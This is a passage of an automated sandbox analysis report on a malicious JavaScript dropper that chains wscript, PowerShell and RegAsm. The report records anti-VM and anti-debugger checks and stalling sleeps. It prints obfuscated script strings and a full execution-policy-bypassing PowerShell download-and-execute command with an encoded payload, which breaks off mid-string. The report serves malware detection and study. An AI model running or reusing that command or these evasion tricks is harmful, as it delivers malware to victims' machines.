Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3804	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6015	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 2859 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 6881 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8056	Thread sleep count: 3804 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8056	Thread sleep count: 6015 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98444s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98202s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97956s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97776s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97099s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -99110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98981s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98231s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98121s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97684s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -97031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -96908s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052	Thread sleep time: -96782s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98444	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97956	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97776	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97099	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98981	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98231	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98121	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96908	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96782	Jump to behavior

Source: powershell.exe, 00000004.00000002.1566950890.000001A8F125F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2225%SystemRoot%\system32\mswsock.dllU
Source: RegAsm.exe, 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: wscript.exe, 00000000.00000003.1402368132.00000269BA08D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1393688812.00000269B9B82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1394747074.00000269B9507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402791922.00000269B9B80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1393885679.00000269B9E22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402564826.00000269B9A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1394877839.00000269B9B81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402669733.00000269B951D000.00000004.00000020.00020000.00000000.sdmp, INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Binary or memory string: var OHGWLHQqcGciercNBjLWCcfjWzosdLtdcTIGvPnnUegQezcHqLUfomZLLLdvtLCWRzhGfSqZWcanKROiLWiOGgfvRZWkWcOPObNWUWKfLWbhLGGpkcUhaxRhTTtcWfoWLUtktTlLLsPlWLcllcGokRKKLCJKGilzqOUviibWLsIbTpocqAckGpaUbCgKcAfoWeeeoLLr = "mLLLTZWKcWZINIoBcZWieHesiCLchBKWKLpLGKBWBWSkslscoorhfAKzhbTOWfhUmbIBKcUaiLidAiQkNnfWqamQGebbRCfWipqpufbhLWZZdceWicWcRKLWaBiceUNejnJqWcuiczmZjcNBLkQNAPfLtmJteNfmKubfdfNhCuKWtUqfoLhfGQLgGcLGhdPNfZzcxboc";
Source: wscript.exe, 00000000.00000003.1402368132.00000269BA08D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402106268.00000269B9E9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1395942369.00000269B9DBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OHGWLHQqcGciercNBjLWCcfjWzosdLtdcTIGvPnnUegQezcHqLUfomZLLLdvtLCWRzhGfSqZWcanKROiLWiOGgfvRZWkWcOPObNWUWKfLWbhLGGpkcUhaxRhTTtcWfoWLUtktTlLLsPlWLcllcGokRKKLCJKGilzqOUviibWLsIbTpocqAckGpaUbCgKcAfoWeeeoLLr
Source: INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Binary or memory string: var KWhOBjNiWbLLqNZPcLKoeqLzhNlGiLUiWdzipKOticvZfkxLNRkWWimWbdxNLeliSvLLrhzUmWLxbLkaWedLLGGcWcKmUfzpcKbCGenCttoKtcLbjUKeNLzLzLvvGbANufPRLfsfbefAHUGkGLeQLmkCbLxLTPzWxGIZHLbrKLLNhNUnLxiLWAGlgKoPNaAAIPKUPtoO = "kWkmqAbxbrqCWsKLtebdgPbAjRQGBbRLGkPBAmGfGIofQqfLKLZLmKbCGoLneZzKNsKTWeSLciBsfLAAPoaSWcicRtehLfHKkoGLRqmLnduatexmKovhWgAArUZpKvNHeWnokLpNBLigLKLgcWWPShULdbWzWLifcAkPaULAWPWWaLZLGKibhnAekgWcLcGNKNoPWCbk";
Source: RegAsm.exe, 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: wscript.exe, 00000000.00000003.1395793371.00000269B9E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cJkZATWWmOhiSbAiWLLiIOHQiGeWxuWtNUoTcWGPbKNGkGActabKIiAWnkLLBvzLZnAHGfSxsNKNiKNeLmWWiLiNxWzACoKGWotoZTSBrdibicWnGhbUkkZZLczZpcsUCApLZUiOsiLiPbrmifpUWffniWBAcLWWWGZacKppWGzxWJLLiWerCNLlSAAbnWxjkaBmGLKk
Source: wscript.exe, 00000000.00000003.1395454803.00000269B9EB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: KWhOBjNiWbLLqNZPcLKoeqLzhNlGiLUiWdzipKOticvZfkxLNRkWWimWbdxNLeliSvLLrhzUmWLxbLkaWedLLGGcWcKmUfzpcKbCGenCttoKtcLbjUKeNLzLzLvvGbANufPRLfsfbefAHUGkGLeQLmkCbLxLTPzWxGIZHLbrKLLNhNUnLxiLWAGlgKoPNaAAIPKUPtoO
Source: wscript.exe, 00000000.00000003.1402368132.00000269BA08D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1393688812.00000269B9B82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1394747074.00000269B9507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402791922.00000269B9B80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1393885679.00000269B9E22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402564826.00000269B9A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1394877839.00000269B9B81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402669733.00000269B951D000.00000004.00000020.00020000.00000000.sdmp, INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Binary or memory string: var lrURvrjImobGlKhhchnceeJCGtZaczaWAqALGmpfoxjWGRLGGcWanedldOWgGccfeSWAkicUfzmKWLzWcqLlvQLUifKLuAWsCGpxZikzbskOpALZieoGLeSeLfcCUoWuctWcGLBiPqrAJfkliRhWLWLicopxKiKZiKIGullcaGzzLbZugxheWKRerKlJeWzLGfCPlmTm = "cJkZATWWmOhiSbAiWLLiIOHQiGeWxuWtNUoTcWGPbKNGkGActabKIiAWnkLLBvzLZnAHGfSxsNKNiKNeLmWWiLiNxWzACoKGWotoZTSBrdibicWnGhbUkkZZLczZpcsUCApLZUiOsiLiPbrmifpUWffniWBAcLWWWGZacKppWGzxWJLLiWerCNLlSAAbnWxjkaBmGLKk";
Source: RegAsm.exe, 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: wscript.exe, 00000000.00000003.1402368132.00000269BA08D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cJkZATWWmOhiSbAiWLLiIOHQiGeWxuWtNUoTcWGPbKNGkGActabKIiAWnkLLBvzLZnAHGfSxsNKNiKNeLmWWiLiNxWzACoKGWotoZTSBrdibicWnGhbUkkZZLczZpcsUCApLZUiOsiLiPbrmifpUWffniWBAcLWWWGZacKppWGzxWJLLiWerCNLlSAAbnWxjkaBmGLKk@a
Source: RegAsm.exe, 00000007.00000002.2712744340.000000000604A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_011B6924 CheckRemoteDebuggerPresent,

7_2_011B6924

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7728.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? 